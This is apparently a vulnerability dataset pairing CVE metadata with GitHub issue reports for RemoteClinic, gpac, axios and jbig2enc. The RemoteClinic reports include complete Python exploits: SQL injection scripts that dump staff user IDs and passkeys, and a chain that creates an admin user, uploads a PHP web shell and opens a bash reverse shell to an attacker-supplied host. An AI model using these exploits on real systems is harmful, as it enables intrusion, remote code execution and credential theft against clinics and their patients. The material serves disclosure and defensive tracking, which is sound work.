### Vulnerable code: [Line 51 in stocks.php](https://github.com/remoteclinic/RemoteClinic/blob/master/medicines/stocks.php#L51) ```php $sql=mysqli_query($con, "select * from p_stock where branch='$id' order by code asc limit 20000")or die(mysqli_error()); ``` User data flows into this manually-constructed SQL string, leading to SQL injection. Instead, prepared statements or a safe library should be used. ### Steps to reproduce / PoC: ```Python import requests import json DELIMITER = "n0kovo :)" DELIMITER_HEX = f"0x{DELIMITER.encode('ascii').hex()}" def send_payload(payload): response = requests.get( "http://localhost/medicines/stocks.php", params=payload, cookies={"PHPSESSID": "f90qm9tq0e6r1idq9tft76f16g"}, ) return response.text def main(): get_dbs_payload = { "id": f"1' UNION ALL SELECT CONCAT({DELIMITER_HEX},JSON_ARRAYAGG(CONCAT_WS({DELIMITER_HEX},schema_name)),{DELIMITER_HEX}),NULL,NULL,NULL,NULL,NULL,NULL FROM INFORMATION_SCHEMA.SCHEMATA-- -" } dbs = json.loads(send_payload(get_dbs_payload).split(DELIMITER)[1]) dbs = [db for db in dbs if db != "information_schema"] for db in dbs: get_users_payload = { "id": f"1' UNION ALL SELECT NULL,NULL,NULL,CONCAT({DELIMITER_HEX},JSON_ARRAYAGG(CONCAT_WS({DELIMITER_HEX},userid,passkey)),{DELIMITER_HEX}),NULL,NULL,NULL FROM {db}.p_staff_dir-- -" } response = send_payload(get_users_payload) if DELIMITER in response: users = '", "'.join(response.split(DELIMITER)[1:-1]) users = json.loads(users) users = zip(users[0::2], users[1::2]) for user in users: output_str = f"{user[0]:<{20}}= {user[1]}" print(output_str) if __name__ == "__main__": main() ```
SQL injection vulnerability in `id` parameter of `/medicines/stocks.php`
https://api.github.com/repos/remoteclinic/RemoteClinic/issues/22/comments
1
2023-05-05T12:17:42Z
2023-11-09T15:25:43Z
https://github.com/remoteclinic/RemoteClinic/issues/22
1,697,523,258
22
5,730
CVE-2023-33479
2023-11-07T15:15:10.690
RemoteClinic version 2.0 contains a SQL injection vulnerability in the /staff/edit.php file.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" }, { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Vendor Advisory" ], "url": "https://github.com/remoteclinic/RemoteClinic/issues/23" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Vendor Advisory" ], "url": "https://github.com/remoteclinic/RemoteClinic/issues/23" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:remoteclinic:remote_clinic:2.0:*:*:*:*:*:*:*", "matchCriteriaId": "E545F721-A065-4091-8405-9B92071E1A44", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "89" ]
89
https://github.com/remoteclinic/RemoteClinic/issues/23
[ "Exploit", "Issue Tracking", "Vendor Advisory" ]
github.com
[ "remoteclinic", "RemoteClinic" ]
### Vulnerable code: [Line 62 in staff/edit.php](https://github.com/remoteclinic/RemoteClinic/blob/master/staff/edit.php#L62) ```php $profile=mysqli_fetch_object(mysqli_query($con, "select * from p_staff_dir where id='$id'")) ``` User data flows into this manually-constructed SQL string, leading to SQL injection. Instead, prepared statements or a safe library should be used. ### Steps to reproduce / PoC: ```Python import requests import json DELIMITER = "n0kovo :)" DELIMITER_HEX = f"0x{DELIMITER.encode('ascii').hex()}" def send_payload(payload): response = requests.get( "http://loocalhost/staff/edit.php", params=payload, cookies={"PHPSESSID": "h8c0op06m61jsk5357q6c0e1h0"}, ) return response.text def main(): get_dbs_payload = { "id": f"-1' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT({DELIMITER_HEX},JSON_ARRAYAGG(CONCAT_WS({DELIMITER_HEX},schema_name)),{DELIMITER_HEX}),NULL,NULL,NULL,NULL,NULL,NULL,NULL FROM INFORMATION_SCHEMA.SCHEMATA-- -" } dbs = json.loads(send_payload(get_dbs_payload).split(DELIMITER)[1]) dbs = [db for db in dbs if db != "information_schema"] for db in dbs: get_users_payload = { "id": f"-1' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT({DELIMITER_HEX},JSON_ARRAYAGG(CONCAT_WS({DELIMITER_HEX},userid,passkey)),{DELIMITER_HEX}),NULL,NULL,NULL,NULL,NULL,NULL,NULL FROM remoteclinic.p_staff_dir-- -" } response = send_payload(get_users_payload) if DELIMITER in response: users = '", "'.join(response.split(DELIMITER)[1:-1]).split('", ""')[0] users = json.loads(users) users = zip(users[0::2], users[1::2]) for user in users: output_str = f"{user[0]:<{20}}= {user[1]}" print(output_str) if __name__ == "__main__": main() ```
SQL injection vulnerability in `id` parameter of `/staff/edit.php`
https://api.github.com/repos/remoteclinic/RemoteClinic/issues/23/comments
1
2023-05-05T12:49:47Z
2023-11-09T15:24:25Z
https://github.com/remoteclinic/RemoteClinic/issues/23
1,697,567,092
23
5,731
CVE-2023-33480
2023-11-07T15:15:10.743
RemoteClinic 2.0 contains a critical vulnerability chain that can be exploited by a remote attacker with low-privileged user credentials to create admin users, escalate privileges, and execute arbitrary code on the target system via a PHP shell. The vulnerabilities are caused by a lack of input validation and access control in the staff/register.php endpoint and the edit-my-profile.php page. By sending a series of specially crafted requests to the RemoteClinic application, an attacker can create admin users with more privileges than their own, upload a PHP file containing arbitrary code, and execute arbitrary commands via the PHP shell.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" }, { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 5.9, "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Vendor Advisory" ], "url": "https://github.com/remoteclinic/RemoteClinic/issues/24" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Vendor Advisory" ], "url": "https://github.com/remoteclinic/RemoteClinic/issues/24" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:remoteclinic:remote_clinic:2.0:*:*:*:*:*:*:*", "matchCriteriaId": "E545F721-A065-4091-8405-9B92071E1A44", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "434" ]
434
https://github.com/remoteclinic/RemoteClinic/issues/24
[ "Exploit", "Issue Tracking", "Vendor Advisory" ]
github.com
[ "remoteclinic", "RemoteClinic" ]
## Vulnerability chain in RemoteClinic application ### Vulnerability description The RemoteClinic application contains a critical vulnerability chain that can be exploited by a remote attacker with low-privileged user credentials to create admin users, escalate privileges, and execute arbitrary code on the target system via a PHP shell. The vulnerabilities are caused by a lack of input validation and access control in the `staff/register.php` endpoint and the `edit-my-profile.php` page. By sending a series of specially crafted requests to the RemoteClinic application, an attacker can create admin users with more privileges than their own, upload a PHP file containing arbitrary code, and execute arbitrary commands via the PHP shell. This can potentially lead to data theft, system disruption, or other malicious activities. ### Steps to reproduce / PoC ```Python import requests from bs4 import BeautifulSoup from pwn import * import argparse from urllib.parse import quote s = requests.Session() parser = argparse.ArgumentParser() parser.add_argument("target_url", help="Target URL") parser.add_argument("userid", help="Low-privileged user ID") parser.add_argument("password", help="Low-privileged user password") parser.add_argument("lhost", help="Local IP for reverse shell") parser.add_argument("lport", type=int, help="Local port for reverse shell") args = parser.parse_args() TARGET_URL = args.target_url USERID = args.userid PASSWORD = args.password LHOST = args.lhost LPORT = args.lport def get_csrf_token(): response = s.get(f"{TARGET_URL}/login/") soup = BeautifulSoup(response.text, "html.parser") csrf_token = soup.find_all("input", {"name": "extra_key"})[0]["value"] return csrf_token def login(userid, password): data = { "user_id": userid, "password": password, "extra_key": get_csrf_token(), "submit": "Login", } response = s.post(f"{TARGET_URL}/login/process.php", data=data) def create_admin(): data = { "first_name": "n0kovo", "last_name": ":)", "userid": "n0kovo@cia.gov", "passkey": "n0kovo", "contact": "0", "access_level": "6", "status": "active", "branch": "13", "image": "", "submit": "Register", } response = s.post(f"{TARGET_URL}/staff/register.php", data=data) def get_reg_id(): response = s.get(f"{TARGET_URL}/staff/my-profile.php") soup = BeautifulSoup(response.text, "html.parser") table_rows = soup.find_all("tr") for row in table_rows: cells = row.find_all("td") if cells[0].text == "Registration ID:": registration_id = int(cells[1].text) return registration_id def upload_shell(): payload = f"<?=`$_GET[0]`?>" data = { "first_name": "n0kovo", "last_name": ":)", "passkey": "", "contact": "0", "submit": "Update", } files = {"image": ("sup.php", payload, "text/php")} s.post( f"{TARGET_URL}/staff/edit-my-profile.php", data=data, files=files, verify=False, proxies={"http": "http://127.0.0.1:8080"}, ) def execute_cmd(registration_id, command): url_encoded_cmd = quote(command, safe="") try: response = s.get( f"{TARGET_URL}/uploads/staff/{registration_id}.php?0={url_encoded_cmd}", timeout=2, ) print(response.text) except requests.exceptions.ReadTimeout: pass def start_listener(port): listener = listen(port) return listener def get_shell(listener): connection = listener.wait_for_connection() log.success("Connection received! Enjoy your shell :)") print() connection.interactive() def exploit(): log.warn(f"Running exploit against {TARGET_URL}...") log.info("Logging in as low-privileged user...") login(USERID, PASSWORD) log.info("Creating admin user...") create_admin() log.info("Escalating privileges...") s.cookies.clear() login("n0kovo@cia.gov", "n0kovo") registration_id = get_reg_id() log.info("Uploading shell...") upload_shell() log.info("Starting listener...") listener = start_listener(LPORT) log.info("Triggering RCE...") log.info(f"URL: {TARGET_URL}/uploads/staff/{registration_id}.php") execute_cmd(registration_id, f"bash -c 'bash -i >& /dev/tcp/{LHOST}/{LPORT} 0>&1'") get_shell(listener) if __name__ == "__main__": exploit() ```
Privilege escalation and arbitrary file upload vulnerability leading to Remote Code Execution
https://api.github.com/repos/remoteclinic/RemoteClinic/issues/24/comments
1
2023-05-06T03:16:43Z
2023-11-09T15:20:47Z
https://github.com/remoteclinic/RemoteClinic/issues/24
1,698,401,625
24
5,732
CVE-2023-33481
2023-11-07T15:15:10.793
RemoteClinic 2.0 is vulnerable to a time-based blind SQL injection attack in the 'start' GET parameter of patients/index.php.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" }, { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Vendor Advisory" ], "url": "https://github.com/remoteclinic/RemoteClinic/issues/25" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Vendor Advisory" ], "url": "https://github.com/remoteclinic/RemoteClinic/issues/25" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:remoteclinic:remote_clinic:2.0:*:*:*:*:*:*:*", "matchCriteriaId": "E545F721-A065-4091-8405-9B92071E1A44", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "89" ]
89
https://github.com/remoteclinic/RemoteClinic/issues/25
[ "Exploit", "Issue Tracking", "Vendor Advisory" ]
github.com
[ "remoteclinic", "RemoteClinic" ]
## Description The web application is vulnerable to a time-based blind SQL injection attack in the 'start' GET parameter of `patients/index.php`. An attacker can inject malicious SQL statements into the application, causing it to respond with a time-delayed response that indicates the vulnerability. Exploiting this vulnerability can allow an attacker to extract sensitive data or perform unauthorized actions on the underlying database. ## Steps to Reproduce 1. Send a specially crafted HTTP GET request to the affected web application, either manually or using a tool such as SQLMAP. 2. Observe that the application responds with a time-delayed response, indicating that the 'start' parameter is vulnerable to time-based blind SQL injection attacks. ## Mitigation To mitigate this vulnerability, the developers of the application should implement proper input validation and parameter sanitization to prevent SQL injection attacks. Additionally, they should consider using parameterized queries or stored procedures to further reduce the risk of SQL injection vulnerabilities.
SQL injection vulnerability in the 'start' GET parameter of `patients/index.php`
https://api.github.com/repos/remoteclinic/RemoteClinic/issues/25/comments
1
2023-05-06T03:48:39Z
2023-11-09T15:21:52Z
https://github.com/remoteclinic/RemoteClinic/issues/25
1,698,412,619
25
5,733
CVE-2023-46001
2023-11-07T22:15:11.473
Buffer Overflow vulnerability in gpac MP4Box v.2.3-DEV-rev573-g201320819-master allows a local attacker to cause a denial of service via the gpac/src/isomedia/isom_read.c:2807:51 function in gf_isom_get_user_data.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" }, { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Patch" ], "url": "https://github.com/gpac/gpac/commit/e79b0cf7e72404750630bc01340e999f3940dbc4" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Patch" ], "url": "https://github.com/gpac/gpac/issues/2629" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch" ], "url": "https://github.com/gpac/gpac/commit/e79b0cf7e72404750630bc01340e999f3940dbc4" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Patch" ], "url": "https://github.com/gpac/gpac/issues/2629" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:gpac:gpac:2.3-dev-rev573-g201320819-master:*:*:*:*:*:*:*", "matchCriteriaId": "63154633-0211-47E2-861B-3FB9BE27BA70", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "120" ]
120
https://github.com/gpac/gpac/issues/2629
[ "Exploit", "Issue Tracking", "Patch" ]
github.com
[ "gpac", "gpac" ]
# Version ``` root@4dd48d09e778:~/gpac/bin/gcc# ./MP4Box -version MP4Box - GPAC version 2.3-DEV-rev573-g201320819-master (c) 2000-2023 Telecom Paris distributed under LGPL v2.1+ - http://gpac.io Please cite our work in your research: GPAC Filters: https://doi.org/10.1145/3339825.3394929 GPAC: https://doi.org/10.1145/1291233.1291452 GPAC Configuration: Features: GPAC_CONFIG_LINUX GPAC_64_BITS GPAC_HAS_IPV6 GPAC_HAS_SOCK_UN GPAC_MINIMAL_ODF GPAC_HAS_QJS GPAC_HAS_LINUX_DVB GPAC_DISABLE_3D ``` # Platform ``` root@4dd48d09e778:~/gpac/bin/gcc# uname -a Linux 4dd48d09e778 5.15.0-56-generic #62-Ubuntu SMP Tue Nov 22 19:54:14 UTC 2022 x86_64 x86_64 x86_64 GNU/Linux ``` # Poc ``` Pocgpac:https://github.com/S0ngJX/Poc/blob/main/Pocgpac ``` # Asan ``` root@4dd48d09e778:~/gpac/bin/gcc# ./MP4Box -dash 1000 -profile live -out session.mpd Pocgpac:@reframer:sap=1 Pocgpac AddressSanitizer:DEADLYSIGNAL ================================================================= ==4066570==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000000 (pc 0x7ffff5cc2ed0 bp 0x7ffffffeaf40 sp 0x7ffffffea6d8 T0) ==4066570==The signal is caused by a READ memory access. ==4066570==Hint: address points to the zero page. #0 0x7ffff5cc2ed0 (/lib/x86_64-linux-gnu/libc.so.6+0x184ed0) #1 0x441f94 in MemcmpInterceptorCommon(void*, int (*)(void const*, void const*, unsigned long), void const*, void const*, unsigned long) (/root/gpac/bin/gcc/MP4Box+0x441f94) #2 0x44236a in bcmp (/root/gpac/bin/gcc/MP4Box+0x44236a) #3 0x7ffff681ed6d in gf_isom_get_user_data /root/gpac/src/isomedia/isom_read.c:2807:51 #4 0x7ffff71e9acb in isor_declare_track /root/gpac/src/filters/isoffin_load.c:696:5 #5 0x7ffff71fb2f6 in isor_declare_objects /root/gpac/src/filters/isoffin_load.c:1728:3 #6 0x7ffff72023e7 in isoffin_setup /root/gpac/src/filters/isoffin_read.c:181:6 #7 0x7ffff71ffb66 in isoffin_configure_pid /root/gpac/src/filters/isoffin_read.c:477:9 #8 0x7ffff6f1abed in gf_filter_pid_configure /root/gpac/src/filter_core/filter_pid.c:876:6 #9 0x7ffff6f367b6 in gf_filter_pid_connect_task /root/gpac/src/filter_core/filter_pid.c:1230:3 #10 0x7ffff6f85478 in gf_fs_thread_proc /root/gpac/src/filter_core/filter_session.c:2105:3 #11 0x7ffff6f83fed in gf_fs_run /root/gpac/src/filter_core/filter_session.c:2405:3 #12 0x7ffff69bd98c in gf_dasher_process /root/gpac/src/media_tools/dash_segmenter.c:1236:6 #13 0x50dfc7 in do_dash /root/gpac/applications/mp4box/mp4box.c:4831:15 #14 0x50dfc7 in mp4box_main /root/gpac/applications/mp4box/mp4box.c:6245:7 #15 0x7ffff5b62082 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x24082) #16 0x42adad in _start (/root/gpac/bin/gcc/MP4Box+0x42adad) AddressSanitizer can not provide additional info. SUMMARY: AddressSanitizer: SEGV (/lib/x86_64-linux-gnu/libc.so.6+0x184ed0) ==4066570==ABORTING ``` # Reproduce ``` ./MP4Box -dash 1000 -profile live -out session.mpd Pocgpac:@reframer:sap=1 Pocgpac ``` # Credit ``` Song Jiaxuan (Huazhong University of Science and Technology) Zeng Yunxiang (Huazhong University of Science and Technology) ```
SEGV in gpac/src/isomedia/isom_read.c:2807:51 in gf_isom_get_user_data
https://api.github.com/repos/gpac/gpac/issues/2629/comments
0
2023-10-10T04:03:18Z
2023-10-11T10:57:17Z
https://github.com/gpac/gpac/issues/2629
1,934,290,908
2,629
5,734
CVE-2023-45857
2023-11-08T21:15:08.550
An issue discovered in Axios 1.5.1 inadvertently reveals the confidential XSRF-TOKEN stored in cookies by including it in the HTTP header X-XSRF-TOKEN for every request made to any host allowing attackers to view sensitive information.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking" ], "url": "https://github.com/axios/axios/issues/6006" }, { "source": "cve@mitre.org", "tags": null, "url": "https://security.netapp.com/advisory/ntap-20240621-0006/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking" ], "url": "https://github.com/axios/axios/issues/6006" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://security.netapp.com/advisory/ntap-20240621-0006/" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:axios:axios:1.5.1:*:*:*:*:node.js:*:*", "matchCriteriaId": "28179B3F-4DC0-416C-BC68-2678D3DF2313", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "352" ]
352
https://github.com/axios/axios/issues/6006
[ "Exploit", "Issue Tracking" ]
github.com
[ "axios", "axios" ]
### Describe the bug Hi team, @jasonsaayman and @DigitalBrainJS, The library inserts the X-XSRF-TOKEN header using the secret XSRF-TOKEN cookie value in **all requests to any server** when the XSRF-TOKEN cookie is available, and the withCredentials setting is turned on. If a malicious user manages to obtain this value, it can potentially lead to the XSRF defence mechanism bypass. It's crucial to ensure the protection of CSRF tokens. These tokens should be treated as confidential information and managed securely at all times. You may check it here: [https://portswigger.net/web-security/csrf/preventing](https://portswigger.net/web-security/csrf/preventing) [https://cheatsheetseries.owasp.org/cheatsheets/Cross-Site_Request_Forgery_Prevention_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/Cross-Site_Request_Forgery_Prevention_Cheat_Sheet.html) Type of vulnerability: [CWE-359: Exposure of Private Personal Information to an Unauthorized Actor](https://cwe.mitre.org/data/definitions/359.html) Severity: High (7.1) [CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:L/A:N](https://cvss.js.org/#CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:L/A:N) ### To Reproduce 1) Start a new project using the latest version of Next.js by running the following command: `npx create-next-app@latest`. Then, install the latest version of the Axios library with this command: `npm i axios` 2) Create an Axios instance with the following configuration, which enables cross-site request forgery (CSRF) protection by including credentials in requests: ``` const instance = axios.create({ withCredentials: true, }); ``` 3) Install the XSRF-TOKEN cookie with specific attributes. Set the cookie value "whatever" and configuring it for the "localhost" domain with strict same-site policy: ``` const cookies = new Cookies(); cookies.set("XSRF-TOKEN", "whatever", { domain: "localhost", sameSite: "strict", }); ``` 4) Initiate a cross-domain request using your Axios instance. In this example, we're making a GET request to "https://www.com/," and we handle the response and potential errors: ``` instance .get("https://www.com") .then((res) => console.log(res.data)) .catch((err) => console.error(err.message)); ``` 5) Run your project, and open the browser's network tab for debugging and monitoring network activity. 6) Verify that the cross-domain request to "https://www.com/" includes the "X-XSRF-TOKEN" header with the value "whatever." 7) Confirm that the "XSRF-TOKEN" cookie's value is disclosed to any 3rd-party host when making requests using the Axios instance. **This is essential for security as you don't want to leak CSRF tokens to unauthorized entities.** ### Code snippet ```js lib/adapters/xhr.js:191 const xsrfValue = (config.withCredentials || isURLSameOrigin(fullPath)) ``` ### Expected behavior ER: the XSRF-TOKEN is not disclosed to a 3rd party host AR: the XSRF-TOKEN is disclosed in every request made with the Axios instance ### Axios Version [v0.8.1] - [v1.5.1] ### Adapter Version _No response_ ### Browser _No response_ ### Browser Version _No response_ ### Node.js Version _No response_ ### OS _No response_ ### Additional Library Versions _No response_ ### Additional context/Screenshots The current effective solution is to change the default XSRF-TOKEN cookie name in the Axios configuration and manually include the corresponding header only in the specific places where it's necessary. [https://nvd.nist.gov/vuln/detail/CVE-2023-45857](https://nvd.nist.gov/vuln/detail/CVE-2023-45857 ) ```bash https://prnt.sc/xDcRmFozxSHJ ```
CVE-2023-45857 (CWE-359) XSRF-TOKEN value is disclosed to an unauthorised actor
https://api.github.com/repos/axios/axios/issues/6006/comments
40
2023-10-16T20:36:35Z
2024-04-19T20:29:13Z
https://github.com/axios/axios/issues/6006
1,946,049,542
6,006
5,735
CVE-2023-46362
2023-11-08T21:15:08.633
jbig2enc v0.28 was discovered to contain a heap-use-after-free via jbig2enc_auto_threshold_using_hash in src/jbig2enc.cc.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Product" ], "url": "https://github.com/agl/jbig2enc" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Vendor Advisory" ], "url": "https://github.com/agl/jbig2enc/issues/84" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Product" ], "url": "https://github.com/agl/jbig2enc" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Vendor Advisory" ], "url": "https://github.com/agl/jbig2enc/issues/84" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:jbig2enc_project:jbig2enc:0.28:*:*:*:*:*:*:*", "matchCriteriaId": "5BB6C453-2F4A-4ED7-B529-879B4527FBE3", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "416" ]
416
https://github.com/agl/jbig2enc/issues/84
[ "Exploit", "Issue Tracking", "Vendor Advisory" ]
github.com
[ "agl", "jbig2enc" ]
# heap-use-after-free in jbig2enc ### Description jbig2enc v0.28 was discovered to contain a heap-use-after-free via jbig2enc_auto_threshold_using_hash in src/jbig2enc.cc. This vulnerability can lead to a Denial of Service (DoS). ### ASAN Log ./src/jbig2 -s -a -p Poc1jbig2enc ```shell ================================================================= ==1464517==ERROR: AddressSanitizer: heap-use-after-free on address 0x603000015470 at pc 0x555555560b51 bp 0x7fffffffdf70 sp 0x7fffffffdf60 READ of size 4 at 0x603000015470 thread T0 #0 0x555555560b50 in remove_templates /test2/jbig2enc/src/jbig2enc.cc:248 #1 0x555555562efd in jbig2enc_auto_threshold_using_hash(jbig2ctx*) /test2/jbig2enc/src/jbig2enc.cc:484 #2 0x55555555f4f1 in main /test2/jbig2enc/src/jbig2.cc:492 #3 0x7ffff6c1f082 in __libc_start_main ../csu/libc-start.c:308 #4 0x55555555bf4d in _start (/test2/jbig2enc/src/jbig2+0x7f4d) 0x603000015470 is located 16 bytes inside of 24-byte region [0x603000015460,0x603000015478) freed by thread T0 here: #0 0x7ffff769251f in operator delete(void*) ../../../../src/libsanitizer/asan/asan_new_delete.cc:165 #1 0x55555557a4f5 in __gnu_cxx::new_allocator<std::_List_node<int> >::deallocate(std::_List_node<int>*, unsigned long) (/test2/jbig2enc/src/jbig2+0x264f5) #2 0x5555555778f3 in std::allocator_traits<std::allocator<std::_List_node<int> > 